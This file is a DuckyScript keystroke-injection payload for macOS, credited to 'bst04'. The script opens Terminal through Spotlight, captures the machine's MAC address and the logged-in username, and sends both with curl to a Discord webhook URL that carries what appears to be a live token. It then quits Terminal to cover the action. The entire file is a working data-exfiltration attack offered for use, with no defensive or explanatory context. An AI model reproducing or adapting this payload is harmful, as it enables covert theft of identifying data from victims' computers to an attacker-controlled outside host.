REM =====================================
REM payload made by bst04
REM gets mac address and username into a
REM webhook
REM =====================================

DELAY 1000
GUI SPACE
DELAY 250
STRING TERMINAL
DELAY 250
ENTER
DELAY 750
STRING mac=$(networksetup -getmacaddress en0) 
DELAY 750
ENTER
DELAY 750
STRING name=$(id -un)
DELAY 750
ENTER
DELAY 850
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" https://discord.com/api/webhooks/1296512673327878145/0h0RYRZEzKa3mIOsSYOJFLbRcxs5KUBhxP1oBbWdbKqbPgzKvENd8yKmyxALnTnpylOL
DELAY 800
ENTER
DELAY 500
GUI q
